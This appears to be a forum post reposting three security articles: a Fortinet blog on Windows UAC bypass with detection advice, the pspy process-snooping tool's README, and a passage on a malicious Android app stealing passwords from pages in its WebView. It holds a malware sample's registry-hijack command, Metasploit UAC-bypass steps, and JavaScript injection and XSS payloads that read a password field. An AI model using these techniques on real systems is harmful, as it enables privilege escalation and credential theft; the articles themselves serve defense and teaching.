    Sursa: https://objective-see.com/blog/blog_0x56.html

  4. Offense and Defense – A Tale of Two Sides: Bypass UAC

    By Anthony Giandomenico | April 01, 2020
     

    FortiGuard Labs Threat Analysis

    Introduction

    In this month’s “Offense and Defense – A Tale of Two Sides” blog, we will be walking through a new technique in sequence as it would happen in a real attack. Since I discussed downloading and executing a malicious payload with PowerShell last time, the next logical step is to focus on a technique for escalating privileges, which is why we will be focusing on the Bypass User Account Control (UAC) attack technique. Once the bad guys have managed to breach defenses and get into a system, they need to make sure they have the right permissions to complete whatever their tasks might be. One of the first obstacles they typically face is trying to bypass the UAC

    It’s important to note that, while very common, Bypass UAC is a much weaker version of a Local Privilege Escalation attack. There are much more sophisticated exploits in the wild that allow for sandbox escapes or becoming a privileged system using a device owned by a least privileged user. But we will save those other topics for another day. 

    User Account Control Review 

    Before we start, we will all need a basic understanding of how UAC works. UAC is an access control feature introduced with Microsoft Windows Vista and Windows Server 2008 (and is included in pretty much all Windows versions after that). The main intent of UAC is to make sure applications are limited to standard user privileges. If a user requires an increase in access privileges, the administrator of the device (usually the owner) needs to authorize that change by actively selecting a prompt-based query. We all should be familiar with this user experience. 

    When additional privileges are needed, a pop-up prompt asks, “Do you want to allow the following program to make changes to this computer?” If you have the full access token (i.e. you are logged in as the administrator of the device, or if you are part of the administrator’s group), you can select ‘yes’, and be on your way. If you’ve been assigned a standard user access token, however, you will be prompted to enter credentials for an administrator who does have the privileges.

    Figure 1. UAC Consent Prompt Figure 1. UAC Consent Prompt
    Figure 2. UAC Credential Prompt Figure 2. UAC Credential Prompt

    NOTE: When you first log in to a Windows 10 machine as a non-admin user, you are granted a standard access token. This token contains information about the level of access you are being granted, including SIDs and Windows privileges. The login process for an administrator is similar. They get the same standard token as the non-admin user, but they also get an additional token that provides admin access. This explains why an administrative user is still prompted with the UAC consent prompt even though they have appropriate access privilege. It’s because the system looks at the standard access token first. If you give your consent by selecting yes, the admin access token kicks in and you are on your merry way.

    The goal for this feature was that it would limit accidental system changes and malware from compromising a system, since elevating privilege required an additional user intervention to verify that this change is what the user was intending to do, and that only trusted apps would receive admin privileges.

    One other item that is important to understand is that Windows 10 protects processes by marking them with certain integrity levels. Below are the highest and lowest integrity levels. 

    • High Integrity (Highest) – apps that are assigned this level can make modifications to system data. Some executables may have auto-elevate abilities. I will dive into this later.
    • Low Integrity (Lowest) - apps that perform a task that could be harmful to the operating system

    There is much more information available out there for the UAC feature, but I think what we have covered gives us the background we need to proceed.

    Bypass User Account Control 

    The UAC feature seems like a good measure for preventing malware from compromising a system. But unfortunately, it turns out that criminals have discovered how to bypass the UAC feature, many of which that are pretty trivial. Many of them work on the specific configuration setting of UAC. Below are a few examples of UAC bypass techniques that have been built into the opensource Metasploit tool to help you test your systems.

    • UAC protection bypass using Fodhelper or Eventvwr and the Registry Key
    • UAC protection bypass using Eventvwr and the Registry Key 
    • UAC protection bypass using COM Handler Hijack

    The first two take advantage of auto-elevation within Microsoft. If a binary is trusted – meaning it has been signed with a MS certificate and is located in a trusted directory, like c:\windows\system32 – the UAC consent prompt will not engage. Both Fodhelper.exe and Eventvwr.exe are trusted binaries. In the Fodhelper example, when that executable is run it looks for two registry keys to run additional commands. One of those registry keys can be modified, so if you put custom commands in there they run at the privilege level of the trusted fodhelper.exe file.

    It’s worth mentioning that these techniques only work if the user is already in the administrator group. If you’re on a system as a standard user, it will not work. You might ask yourself, “why do I need to perform this bypass if I’m already an admin?” The answer is that if the adversary is on the box remotely, how do they select the yes button when the UAC consent prompt appears? They can’t, so the only way around it is to get around the prompt itself.

    The COM handler bypass is similar, as it references specific registry (COM hander) entries that can be created and then referenced when a high integrity process is loaded. On a side note, if you want to see which executables can auto-elevate, try using the strings program which is part of sysinternals:

    Example = Strings -sc:\windows\system32\*.exe | findstr /I autoelevate

    As I mentioned, there are many more bypass UAC techniques. If you want to explore more, which I think you should do to ensure you’re protected against them, or at least can detect them, you can start at this GitHub site (UACMe)

    Defenses against Bypass UAC 

    Now that we understand that bypassing the UAC controls is possible, let’s talk about defenses you have against these attacks. You have four settings for User Account Control in Windows 7/10. The settings options are listed below.

    • Always notify       
      • Probably the most secure setting. If you select this, it will always notify you when you make changes to your system, such as installing software programs or when you are making direct changes to Windows settings. When the UAC prompt is displayed, other tasks are frozen until you respond.
    • Notify me only when programs try to make changes to my computer
      • This setting is similar to the first. It will notify when installing software programs and will freeze all other tasks until you respond to the prompt. However, it will not notify you when you try to modify changes to the system. 
    • Notify me only when programs try to make changes to my computer (do not dim my desktop) 
      • As the setting name suggests, it’s the same as the one above. But when the UAC consent prompt appears, other tasks on the system will not freeze. 
    • Never notify (Disable UAC)
      • I think it’s obvious what this setting does. It disables User Access Control. 

    The default setting for UAC is “Notify me only when programs try to make changes to my computer.” I mention this because some attack techniques will not work if you have UAC set to “Always notify.” A word to the wise.

    Another great defense for this technique is to simply not run as administrator. Even if you own the device, work as a standard user and elevate privileges as needed when performing tasks that require them. This sounds like a no-brainer, but many organizations still provide admin privileges to all users. The reasoning is usually because it’s easier. That’s true, but it’s also easier for the bad guys as well.

    Privilege escalation never really happens as a single event. They are multiple techniques chained together, with the next dependent on the one before successfully executing. So with that in mind, the best way to break the attack chain is to prevent any of these techniques from successfully completing – and the best place to do this is usually by blocking a technique in the execution tactic category or before when being delivered. If the adversary cannot get a foothold on the box, they certainly are not going to be able to execute a bypass UAC technique.

    If you’re interested in learning more about technique chaining and dependencies, Andy Applebaum created a nice presentation given at the First Conference that you might want to take a look at. 

    One common question people ask is, “why are there no CVEs for theseUAC security bypass attacks?” It’s because Microsoft doesn’t consider UAC to be a security bypass, so you will not see them in the regular patch Tuesdays. 

    Real-World Examples & Detections 

    Over the years, our FortiGuard Labs team has discovered many threats that include a bypass UAC technique. A great example is a threat we discovered a few years back that contained the Fareit malware. A Fareit payload typically includes stealing credentials and downloading other payloads. This particular campaign run was delivered via a phishing email containing a malicious macro that called a PowerShell script to download a file named sick.exe. This seems like a typical attack strategy, but to execute the sick.exe payload it used the high integrity (auto-elevated) eventvwr.exe to bypass the UAC consent prompt. Below is the PowerShell script.

    Figure 3. PowerShell Script Figure 3. PowerShell Script

    You can see that the first part of the script downloads the malicious file using the (New-object System.net.webclient).Downloadfile() method we discussed in the first blog in this series. The second part of the script adds an entry to the registry using the command reg add HKCU\Software\Classes\mscfile\shell\open\command /d %tmp%\sick.exe /f.

    Figure 4. Registry Modified by PowerShell Script Figure 4. Registry Modified by PowerShell Script

    Finally, the last command in the script runs the eventvwr.exe, which needs to run MMC. As I discussed earlier, the exe has to query both the HKCU\Software\Classes\mscfile\shell\open\command\ and HKCR\mscfile\shell\open\command\. When it does so, it will find sick.exe as an entry and will execute that instead of the MMC.

    Our 24/7 FortiResponder Managed Detection and Response team also sees a good amount of bypass UAC activity in our customers’ environments. Usually, the threat is stopped earlier in the attack chain, before it has a chance to run the technique, but there are occasions when it is able to progress beyond that point. We also observe it if the FortiEDR configuration is in simulation mode. 

    A recent technique we detected and blocked was a newer version of Trickbot. When this payload runs it tries to execute the WSReset UAC Bypass technique to circumvent the UAC prompt. Once again, it leverages an executable that has higher integrity (and higher privilege) and has the autoElevate property enabled. This specific bypass works on Windows 10. If the payload encounters Windows 7, it will instead use the CMSTPUA UAC bypass technique. In Figure 5 you can see our FortiEDR forensic technology identify the reg.exe trying to modify the registry value with DelegateExecute. 

    Figure 5. FortiEDR technology detecting a bypass UAC technique Figure 5. FortiEDR technology detecting a bypass UAC technique

    Our FortiSIEM customers can take advantage of rules to detect some of these UAC bypass techniques. Below is an example rule to detect a UAC bypass using the Windows backup tool sdclt.exe and the Eventvwr version we mentioned before.

    Figure 6. FortiSIEM rule to detect some Bypass UAC techniques Figure 6. FortiSIEM rule to detect some Bypass UAC techniques

    Below, in Figure 7, we can see the sub-patterns for the rule detecting the eventvwr Bypass UAC version. 

    Figure 7. FortiSIEM SubPattern to detect Bypass UAC technique using eventvwr.exe Figure 7. FortiSIEM SubPattern to detect Bypass UAC technique using eventvwr.exe

    If you’re not using a technology like FortiEDR or FortiSIEM, you could start monitoring on your own (using sysmon). But again, it could be difficult since there are so many variations.  In general, you can look for registry changes or additions in certain areas and the auto-elevated files being used, depending on the specific bypass UAC technique.  For the eventvwr.exe version you could look for new entries in HKCU\SoftwarClasses. Also keep an eye on the consent.exe file since it’s the one that launches the User Interface for UAC. Look for the amount of time it takes for the start and end time of the consent process. If it’s milliseconds, it’s not being done by a human but an automated process. Lastly, when looking at the entire UAC process, a legitimate execution is usually much simpler in nature, whereas the bypass UAC process is a bit more complex or noisy in the logs. 

    You will have to do a lot of research to figure out the right rules to trigger on. It’s probably better to just get a technology that can help prevent or detect the technique. 

    This should save you a lot of time and personnel overhead.

    Reproducing the Techniques 

    Once you’ve done your research on the technique, it’s time to figure out how to reproduce it so you can figure out whether or not you detect it. Some of the same tools apply as I mentioned last time, but there are a few that are fairly easy to use. Below are a few examples.

    Simulation Tool

    Atomic Red Team has some very basic tests you can use to simulate a UAC bypass. Figure 8, below, lists them.

    Figure 8. A list of Bypass UAC tests Figure 8. A list of Bypass UAC tests

    Open Source Defense Testing Tool 

    As I mentioned earlier, Metasploit has a few bypass UAC techniques you can leverage. Remember that in the attack chain your adversary already has an initial foothold on the box, and they are trying to get around UAC. With that said, you should already have a meterpreter session running on your test box. Executing the steps to run a bypass UAC (using fodhelper) technique is pretty simple.

    First, put your meterpreter session in the background by typing the command background. Next, type use exploit/windows/local/bypassuac_fodhelper. From there you need to add your meterpreter session to use the exploit. Type in set session <your session #> and then type exploit. If you’re successful, you should have something on your screen that looks like what’s shown in figure 9, below.

    Figure 9. Successful bypass UAC using fodhelper file. Figure 9. Successful bypass UAC using fodhelper file.

    Lastly, in video 1 below, I walk you through a bypass UAC technique available in Metasploit. I had established initial access and ended up with a meterpreter session. From there I tried to add a registry for persistence, but don’t have the right access. So, I try to run the getsystem command, but that fails as well. This is usually because UAC is enabled. I then select one of the bypass UAC techniques, which then allows me to elevate my system privilege and add my persistence into the registry.

    Conclusion

    Once again, we continue play the cat and mouse game. As an industry we build protections (in this case UAC) and eventually the adversary finds ways around them. This will most likely not change. So the important task is understanding your strengths and weaknesses against these real-world attacks. If you struggle with keeping up to date with all of this, you can always turn to your consulting partner or vendor to make sure you have the right security controls and services in place to keep up with the latest threats, and that you are also able to address the risk and identify malicious activities using such tools as EDRMDRUEBA and SIEM technologies. 

    I will close this blog like I did last time. As you go through the process of testing each Bypass UAC attack technique, it is important to not only understand the technique, but also be able to simulate it. Then, monitor your security controls, evaluate if any gaps exist, and document and make improvements needed for coverage.

     Stay tuned for our next Mitre ATT&CK technique blog - Credential Dumping. 

    Find out more about how FortiResponder Services enable organizations to achieve continuous monitoring as well as incident response and forensic investigation.

    Learn how FortiGuard Labs provides unmatched security and intelligence services using integrated AI systems.

    Find out about the FortiGuard Security Services portfolio and sign up for our weekly FortiGuard Threat Brief.

    Discover how the FortiGuard Security Rating Service provides security audits and best practices to guide customers in designing, implementing, and maintaining the security posture best suited for their organization.

     

    Sursa: https://www.fortinet.com/blog/threat-research/offense-and-defense-a-tale-of-two-sides-bypass-uac.html

  5. pspy - unprivileged Linux process snooping

    Go Report Card Maintainability Test Coverage CircleCI

    pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea.

    The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.

    Getting started

    Download

    Get the tool onto the Linux machine you want to inspect. First get the binaries. Download the released binaries here:

    • 32 bit big, static version: pspy32 download
    • 64 bit big, static version: pspy64 download
    • 32 bit small version: pspy32s download
    • 64 bit small version: pspy64s download

    The statically compiled files should work on any Linux system but are quite huge (~4MB). If size is an issue, try the smaller versions which depend on libc and are compressed with UPX (~1MB).

    Build

    Either use Go installed on your system or run the Docker-based build process which ran to create the release. For the latter, ensure Docker is installed, and then run make build-build-image to build a Docker image, followed by make build to build the binaries with it.

    You can run pspy --help to learn about the flags and their meaning. The summary is as follows:

    • -p: enables printing commands to stdout (enabled by default)
    • -f: enables printing file system events to stdout (disabled by default)
    • -r: list of directories to watch with Inotify. pspy will watch all subdirectories recursively (by default, watches /usr, /tmp, /etc, /home, /var, and /opt).
    • -d: list of directories to watch with Inotify. pspy will watch these directories only, not the subdirectories (empty by default).
    • -i: interval in milliseconds between procfs scans. pspy scans regularly for new processes regardless of Inotify events, just in case some events are not received.
    • -c: print commands in different colors. File system events are not colored anymore, commands have different colors based on process UID.
    • --debug: prints verbose error messages which are otherwise hidden.

    The default settings should be fine for most applications. Watching files inside /usr is most important since many tools will access libraries inside it.

    Some more complex examples:

    # print both commands and file system events and scan procfs every 1000 ms (=1sec)
    ./pspy64 -pf -i 1000 
    
    # place watchers recursively in two directories and non-recursively into a third
    ./pspy64 -r /path/to/first/recursive/dir -r /path/to/second/recursive/dir -d /path/to/the/non-recursive/dir
    
    # disable printing discovered commands but enable file system events
    ./pspy64 -p=false -f

    Examples

    Cron job watching

    To see the tool in action, just clone the repo and run make example (Docker needed). It is known passing passwords as command line arguments is not safe, and the example can be used to demonstrate it. The command starts a Debian container in which a secret cron job, run by root, changes a user password every minute. pspy run in foreground, as user myuser, and scans for processes. You should see output similar to this:

    ~/pspy (master) $ make example
    [...]
    docker run -it --rm local/pspy-example:latest
    [+] cron started
    [+] Running as user uid=1000(myuser) gid=1000(myuser) groups=1000(myuser),27(sudo)
    [+] Starting pspy now...
    Watching recursively    : [/usr /tmp /etc /home /var /opt] (6)
    Watching non-recursively: [] (0)
    Printing: processes=true file-system events=false
    2018/02/18 21:00:03 Inotify watcher limit: 524288 (/proc/sys/fs/inotify/max_user_watches)
    2018/02/18 21:00:03 Inotify watchers set up: Watching 1030 directories - watching now
    2018/02/18 21:00:03 CMD: UID=0    PID=9      | cron -f
    2018/02/18 21:00:03 CMD: UID=0    PID=7      | sudo cron -f
    2018/02/18 21:00:03 CMD: UID=1000 PID=14     | pspy
    2018/02/18 21:00:03 CMD: UID=1000 PID=1      | /bin/bash /entrypoint.sh
    2018/02/18 21:01:01 CMD: UID=0    PID=20     | CRON -f
    2018/02/18 21:01:01 CMD: UID=0    PID=21     | CRON -f
    2018/02/18 21:01:01 CMD: UID=0    PID=22     | python3 /root/scripts/password_reset.py
    2018/02/18 21:01:01 CMD: UID=0    PID=25     |
    2018/02/18 21:01:01 CMD: UID=???  PID=24     | ???
    2018/02/18 21:01:01 CMD: UID=0    PID=23     | /bin/sh -c /bin/echo -e "KI5PZQ2ZPWQXJKEL\nKI5PZQ2ZPWQXJKEL" | passwd myuser
    2018/02/18 21:01:01 CMD: UID=0    PID=26     | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root
    2018/02/18 21:01:01 CMD: UID=101  PID=27     |
    2018/02/18 21:01:01 CMD: UID=8    PID=28     | /usr/sbin/exim4 -Mc 1enW4z-00000Q-Mk

    First, pspy prints all currently running processes, each with PID, UID and the command line. When pspy detects a new process, it adds a line to this log. In this example, you find a process with PID 23 which seems to change the password of myuser. This is the result of a Python script used in roots private crontab /var/spool/cron/crontabs/root, which executes this shell command (check crontab and script). Note that myuser can neither see the crontab nor the Python script. With pspy, it can see the commands nevertheless.

    CTF example from Hack The Box

    Below is an example from the machine Shrek from Hack The Box. In this CTF challenge, the task is to exploit a hidden cron job that's changing ownership of all files in a folder. The vulnerability is the insecure use of a wildcard together with chmod (details for the interested reader). It requires substantial guesswork to find and exploit it. With pspy though, the cron job is easy to find and analyse:

    animated demo gif

    How it works

    Tools exist to list all processes executed on Linux systems, including those that have finished. For instance there is forkstat. It receives notifications from the kernel on process-related events such as fork and exec.

    These tools require root privileges, but that should not give you a false sense of security. Nothing stops you from snooping on the processes running on a Linux system. A lot of information is visible in procfs as long as a process is running. The only problem is you have to catch short-lived processes in the very short time span in which they are alive. Scanning the /proc directory for new PIDs in an infinite loop does the trick but consumes a lot of CPU.

    A stealthier way is to use the following trick. Process tend to access files such as libraries in /usr, temporary files in /tmp, log files in /var, ... Using the inotify API, you can get notifications whenever these files are created, modified, deleted, accessed, etc. Linux does not require priviledged users for this API since it is needed for many innocent applications (such as text editors showing you an up-to-date file explorer). Thus, while non-root users cannot monitor processes directly, they can monitor the effects of processes on the file system.

    We can use the file system events as a trigger to scan /proc, hoping that we can do it fast enough to catch the processes. This is what pspy does. There is no guarantee you won't miss one, but chances seem to be good in my experiments. In general, the longer the processes run, the bigger the chance of catching them is.

    Misc

    Logo: "By Creative Tail [CC BY 4.0 (http://creativecommons.org/licenses/by/4.0)], via Wikimedia Commons" (link)

     

    Sursa: https://github.com/DominicBreuker/pspy

  6. Android Webview Exploited

    How an android app can bypass CSP, iframe sandbox attributes, etc. to compromise the page getting loaded in the webview despite the classic protections in place.

    qreoct

    Read more posts by this author.

    qreoct

    24 Mar 2020 20 min read

    There are plenty of articles explaining the security issues with android webview, like this article & this one. Many of these resources talk about the risks that an untrusted page, loaded inside a webview, poses to the underlying app. The threats become more prominent especially when javascript  and/or the javascript interface is enabled on the webview.

    In short, having javascript enabled & not properly fortified allows for execution of arbitrary javascript in the context of the loaded page, making it quite similar to any other page that may be vulnerable to an XSS. And again, very simply put, having the javascript interface enabled allows for potential code execution in the context of the underlying android app.

    In many of the resources, that I came across, the situation was such that the victim was the underlying android app inside whose webview a page would open either from it's own domain or from an external source/domain. While attacker was the entity external to the app, like an actor exploiting a potential XSS on the page loaded from the app's domain (or the third party domain from where the page is being loaded inside the webview itself acting malicious). The attack vector was the vulnerable/malicious page loaded in the the webview.

    This blog talks about a different attack scenario!

    Victim: Not the underlying android app, but the page itself that is being loaded in the webview.

    Attacker: The underlying android app, in whose webview the page is being loaded.

    Attack vector: The vulnerable/malicious page loaded in the the webview.(through the abuse of the insecure implementations of some APIs)

    The story line

    A certain product needs to integrate with a huge business. Let us call this huge business as BullyGiant & the certain product as AppAwesome from this point on.  

    Many users have an account on both AppAwesome & also on BullyGiant. The flow involves such users of BullyGiant to check out on their payments page with AppAwesome. Every transaction on AppAwesome requires to be authenticated & authorized by the user by entering their password on the AppAwesome's checkout page, which appears before any transaction is allowed to go through.

    AppAwesome cares about the security of it's customers. So it proposes the below security measures to anyone who wants to integrate with them, especially around AppAwesome's checkout page.

    1. Loading of the checkout page using AppAwesome's SDK. All of the page & it's contents are sandboxed & controlled by the SDK. This approach allows for maximum security & the best user experience.
    2. Loading of the checkout page on the underlying browser (or custom chrome tabs, if available). This approach again has quite decent security (limited by of course the underlying browser's security) but not a very good user experience.
    3. Loading of the checkout page in the webview of the integrating app. This is comparatively the most insecure of the above proposals, although offers a better user experience than the second approach mentioned above.

    Now the deal is that AppAwesome is really very keen on securing their own customers' financial data & hence very strongly recommends usage of their SDK. BullyGiant on the other hand, for some reason, (hopefully justified) does not really want to abide by the secure integration proposals by AppAwesome. AppAwesome does have a choice to deny any integration with BullyGiant. However, this integration is really crucial for AppAwesome to provide a superior user experience to it's own users & in fact even more crucial for AppAwesome to stay in the game.

    So AppAwesome gives in & agrees to integrate with BullyGiant succumbing to their terms of integration, i.e. using the least secure webview approach. The only things that protect AppAwesome's customers now is the trust that AppAwesome has on BullyGiant, which is somewhat also covered through the legal contracts between AppAwesome & BullyGiant. That's all.

    Technical analysis (TL;DR)

    Thanks: Badshah & Anoop for helping with the execution of the attack idea. Without your help, this blog post would not have been possible, at least not while it's still relevant :)

    Below is a tech analysis of why webview is a bad idea. It talks about how can a spurious (or compromised) app abuse webview features to extract sensitive data from the page loaded inside the webview, despite the many security mechanisms that the page, being loaded in the webview, might have implemented. We discuss in details, with many demos, how CSP, iframe sandbox etc. may be bypassed in android webview. Every single demo has a linked code base on my Github so they could be tried out first hand. Also, the below generic scheme is followed (not strictly in that order) throughout the blog:

    1. A simple demo of the underlying concepts on the browser & android webview
    2. Addition of security features to the underlying concepts & then demo of the same on the browser & android webview
    NB: Please ignore all other potential security issues that might be there with the code base/s

    Case 1: No protection mechanisms

    Apps used in this section:

    1. AppAwesome
    2. BullyGiant

    AppAwesome when accessed from a normal browser:

    ss3.png Vanilla AppAwesome Landing Page - Browser

    And on submitting the above form:

    ss4.png Vanilla AppAwesome Checkout Page -Browser

    AppAwesome when accessed from BullyGiant app:

    screen1-2.png Vanilla AppAwesome Page - Android Webview

    Notice the Authenticate Payment web page is loaded inside a webview of the BullyGiant app.

    And on submitting the form above:

    scree2.png Vanilla AppAwesome Page - Android Webview

    Notice that clicking on the Submit button also displays the content of the password field as a toast message on BullyGiant. This proves how the underlying app may be able to sniff any data (sensitive or otherwise) from the page loaded in it's webview.

    Under the BullyGiant hood

    The juice of why BullyGiant was able to sniff password field out from the webview is because it is in total control of it's own webview & hence can change the properties of the webview, listen to events etc. That is exactly what it is doing. It is

    1. enabling javascript on it's webview &
    2. then it is listening for onPageFinished event

    Snippet from BullyGiant:

        ...
        final WebView mywebview = (WebView) findViewById(R.id.webView);
        mywebview.clearCache(true);
        mywebview.loadUrl("http://192.168.1.38:31337/home");
        mywebview.getSettings().setJavaScriptEnabled(true);
        mywebview.setWebChromeClient(new WebChromeClient());
        mywebview.addJavascriptInterface(new AppJavaScriptProxy(this), "androidAppProxy");
        mywebview.setWebViewClient(new WebViewClient(){
            @Override
            public void onPageFinished(WebView view, String url) {...}
        ...

    Note that there is addJavascriptInterface as well. This is what many blogs (quoted in the beginning of this blog) talk about where the loaded web page can potentially be harmful to the underlying app. In our use case however, it is not of much consequence (from that perspective). All that it is used for is to show that BullyGiant could read the contents of the page loaded in the webview. It does so by sending the read content back to android (that's where the addJavascriptInterface  is used) & having it displayed as a toast message.

    The other important bit in the BullyGiant code base is the over ridden onPageFinished() :

        ...
        super.onPageFinished(view, url);
        mywebview.loadUrl("javascript:var button = document.getElementsByName(\"submit\")[0];button.addEventListener(\"click\", function(){ androidAppProxy.showMessage(\"Password : \" + document.getElementById(\"password\").value); return false; },false);");
        ...
    

    That's where the javascript to read the password filed from the DOM is injected into the page loaded inside the webview.

    The story line continued...

    AppAwesome came about with the below solutions to prevent the web page from being read by the underlying app:

    Suggestion #1: Use CSP

    Use CSP to prevent BullyGiant from executing any javascript whatsoever inside the page loaded in the iframe

    Suggestion #2: Use Iframe Sandbox

    Load the sensitive page inside of an iframe on the main page in the webview. Use iframe sandbox to restrict any interactions between the parent window/page & the iframe content.

    CSP is a mechanism to prevent execution of  untrusted javascript inside a web page. While the sandbox attribute of iframe is a way to tighten the controls of the page within an iframe. It's very well explained in many resources like here.

    With all the above restrictions imposed, our goal now would be to see if BullyGiant can still access the AppAwesome page loaded inside the webview or not. We would go about analyzing how each of the suggested solutions work in a normal browser & in a webview & how could BullyGiant access the loaded pages if at all.

    Exploring CSP With Inline JS

    Apps used in this section:

    1. AppAwesome
    2. BullyGiant

    Before moving on to the demo of CSP implementation & it's effect/s on Android Webview, let's look at how a non-CSP page behaves in the normal (non-webview) browser & a webview.

    To demo this we have added an inline JS that would alert 1 on clicking of the submit button before proceeding to the success checkout page. AppAwesome code snippet:

    <!DOCTYPE HTML>
        ...
        <script type="text/javascript">
          function f(){
            alert(1);
          }
        </script>
        ...
          <input type="submit" value="Submit" name="submit" name="submit" onclick="f();">
        ...
    </html>
    

    AppAwesome when accessed from the browser & when Submit button is clicked:

    ss7.png Vanilla AppAwesome Page - Inline JS => Firefox 74.0

    AppAwesome when accessed from BullyGiant app:

    ss8.png Vanilla AppAwesome Page - Inline JS => Android Webview

    The above suggests that so far there is no change in how the page is treated by the 2 environments. Now let's check the change in behavior (if at all) when CSP headers are implemented.

    With CSP Implemented

    Apps used in this section:

    1. AppAwesome
    2. BullyGiant

    Browser

    A quick demo of these features on a traditional browser (not webview) suggests that these controls are indeed useful (when implemented the right way) with what they are intended for.

    AppAwesome when accessed from a browser:

    ss5.png CSP AppAwesome page - Inline JS => Firefox 74.0

    Notice the Content Security Policy violations. These violations happen because of the CSP response headers, returned by the backend & enforced by the browser.

    Response headers from AppAwesome:

    ss6-1.png CSP AppAwesome page - Inline JS => Firefox 74.0

    Android Webview

    AppAwesome when accessed from BullyGiant gives the same Authenticate Payment page as above & the exact same CSP errors too! This can be seen from the below screenshot of a remote debugging session taken from Chrome 80.0:

    (Firefox was not chosen for remote debugging because I was lazy to set up remote debugging on Firefox. Firefox set up on the AVD was required too :( as per this from the FF settings page. Also further down for all the demos we use adb logs instead of remote debugging sessions to show browser console messages)

    ss9.png On Google Chrome 80.0

    Hence, we see that CSP does prevent execution of inline JS inside android webview, very much like a normal browser does.

    Exploring CSP With Injected JS

    Apps used in this section:

    1. AppAwesome
    2. AppAwesome (with XSS-Auditor disabled)
    3. BullyGiant (without XSS payload)
    4. BullyGiant (with XSS payload)

    AppAwesome has been made deliberately vulnerable to a reflected XSS by adding a query parameter, name, to the home page. This param is vulnerable to reflected XSS. Also, all inline JS has been removed from this page to further emphasize on CSP's impact on injected JS.

    AppAwesome when accessed from the browser while the name query parameter's value is John Doe:

    ss10.png On Google Chrome 80.0

    Now, for the sake of the demo, we would exploit the XSS vulnerable name query param to add an onclick event to the Submit button such that clicking it would alert "injected 1"

    XSS exploit payload

    <body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}</script>
    

    AppAwesome when accessed from the browser & exploited with the above payload (in name query parameter):

    ss11.png Vanilla AppAwesome Page - Exploited XSS => Firefox

    AppAwesome when accessed from BullyGiant, without exploiting the XSS:

    ss12.png Vanilla AppAwesome Page - Vulnerable param => Android Webview

    AppAwesome when accessed from BullyGiant, while attempting to exploit the XSS, produces the same screen as above, however, contrary to the script injection that was successful in case of a normal browser, this time clicking on the Submit button didn't really execute the payload at all. We were instead taken directly to the checkout page. Adb logs however did produce an interesting message as shown below:

    ss13.png Vanilla AppAwesome Page - Exploited XSS => Android Webview

    The adb log messages is:

    03-27 12:29:33.672 26427-26427/com.example.webviewinjection I/chromium: [INFO:CONSOLE(9)] "The XSS Auditor refused to execute a script in 'http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E' because its source code was found within the request. The auditor was enabled as the server sent neither an 'X-XSS-Protection' nor 'Content-Security-Policy' header.", source: http://192.168.1.35:31337/home?name=<body onload="f()"><script type="text/javascript">function f(){var button=document.getElementsByName("submit")[0];button.addEventListener("click", function(){ alert("injected 1"); return false; },false);}%3C/script%3E (9)
    

    So without even any explicit protection mechanism/s (like CSP or iframe sandbox), android webview seems to have a default protection mechanism called XSS Auditor. This however has nothing to do with our use case. Moreover, it hinders with our demo as well.  Hence, for now, for the sake of this demo, we would make AppAwesome return X-XSS-Protection HTTP header, as below, to take care of this issue.

    X-XSS-Protection: 0

    Note: As an auxiliary, XSS Auditor would also be accounted for a bypass towards the end of the blog :)

    AppAwesome when accessed now from BullyGiant, while attempting to exploit the XSS:

    ss13-2.png Vanilla AppAwesome Page - Exploited XSS => Android Webview

    Thus we see that the XSS payload works equally well even in the Android Webview (of course with the XSS Auditor intentionally disabled).

    Note: If the victim is the page getting loaded inside webview, it makes absolute sense that it's backend would never ever return any HTTP headers, like the above, that possibly weakens the security of the page itself. We will see why this is irrelevant further down.

    The other thing to note is that there was a subtle difference between how the payloads were injected in the vulnerable parameter in both the cases, the browser & the webview. And it is important to take note of it because it highlights the very premise of this blog post. In case of the browser, the attacker is an external party, who could send the JS payload to be able to exploit the vulnerable name parameter. Whereas in case of the android webview, the underlying app itself is the malicious actor & hence it is injecting the JS payload in the vulnerable name parameter before loading the page in it's own webview. This difference would be more prominent when we analyze further cases & how the malicious app leverages it's capabilities to exploit the page loaded in the webview.

    With CSP Implemented

    Apps used in this section:

    1. AppAwesome
    2. BullyGiant (with XSS payload)
    3. BullyGiant (with CSP bypass)
    4. BullyGiant (with CSP bypass reading the password field)

    Browser

    With the appropriate CSP headers in place, inline JS does not work in browsers as we saw above. What would happen if javascript is injected in the page that has CSP headers? Would it still have CSP violation errors?

    AppAwesome, with vulnerable name parameter & XSS-Auditor disabled, when accessed in the browser & the name query param exploited with the same XSS payload (as earlier):

    ss16.png CSP AppAwesome Page - Exploited XSS => Firefox

    The console error messages are the same as with inline JS. Injected JS does not get executed as the CSP policy prevents it. Would the same XSS payload work when the above CSP page is loaded inside Android Webview?

    AppAwesome when accessed from BullyGiant app that injects the JS payload in the vulnerable name parameter before loading the page in the android webview:

    ss15.png CSP AppAwesome Page - Exploited XSS => Android Webview

    The same adb log is produced confirming that CSP works well in case of even injected javascript payload inside a webview.

    Note: In the CSP related examples above (browser or webview) note that CSP kicks in before the page actually gets loaded.

    With the above note, some interrelated questions that arise are:

    1. What would happen if BullyGiant wanted to access the contents of the page after it get successfully loaded?
    2. Could it add javascript to the already loaded page, as if this were being done locally?
    3. Would CSP still interfere?

    Since the webview is under the total control of the underlying app, in our case BullyGiant, & since there are android APIs available to control the lifecycle of pages loaded inside the webview, BullyGiant could pretty much do whatever it wants with the loaded page's contents. So instead of injecting the javascript payload in the vulnerable parameter, as in the above example, BullyGiant may choose to instead inject it directly in the page itself after the page is loaded, without having the need to actually exploit the vulnerable name parameter at all.

    AppAwesome when accessed from BullyGiant that implements the above trick to achieve JS execution despite CSP:

    ss16-2.png CSP AppAwesome Page - Exploited XSS => Android Webview

    The logs still show the below message:

